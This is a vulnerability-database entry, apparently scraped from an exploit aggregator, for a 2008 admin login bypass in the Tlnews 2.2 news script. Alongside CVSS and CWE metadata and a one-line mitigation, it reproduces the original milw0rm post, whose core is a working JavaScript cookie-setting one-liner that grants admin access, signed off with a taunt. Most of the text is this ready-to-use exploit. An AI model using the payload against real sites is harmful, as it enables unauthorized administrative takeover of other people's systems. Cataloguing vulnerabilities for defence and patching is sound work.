header-logo
Suggest Exploit
vendor:
Tlnews
by:
X0r - EvolutionTeaM
8.8
CVSS
HIGH
Admin Login Bypass
287
CWE
Product Name: Tlnews
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:easy-script:tlnews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Tlnews 2.2 Admin Login Bypass (via Cookie)

A vulnerability in Tlnews 2.2 allows an attacker to bypass the admin login by setting a cookie with the value 'tlNews_login=admin; content=admin; path=/'

Mitigation:

Ensure that authentication credentials are properly validated and that the application is not vulnerable to cookie manipulation.
Source

Exploit-DB raw data:

Tlnews 2.2 Admin Login Bypass (via Cookie)
Found by X0r - EvolutionTeaM
Email: evolutionteam.x0[at]gmail[dot]com

Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip

Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin;
path=/"

Beby y0ur system g0t d0wn :P 

// X0r - EvolutionTeaM

# milw0rm.com [2008-10-25]

Navigation

Suggest Exploit

Services By CQR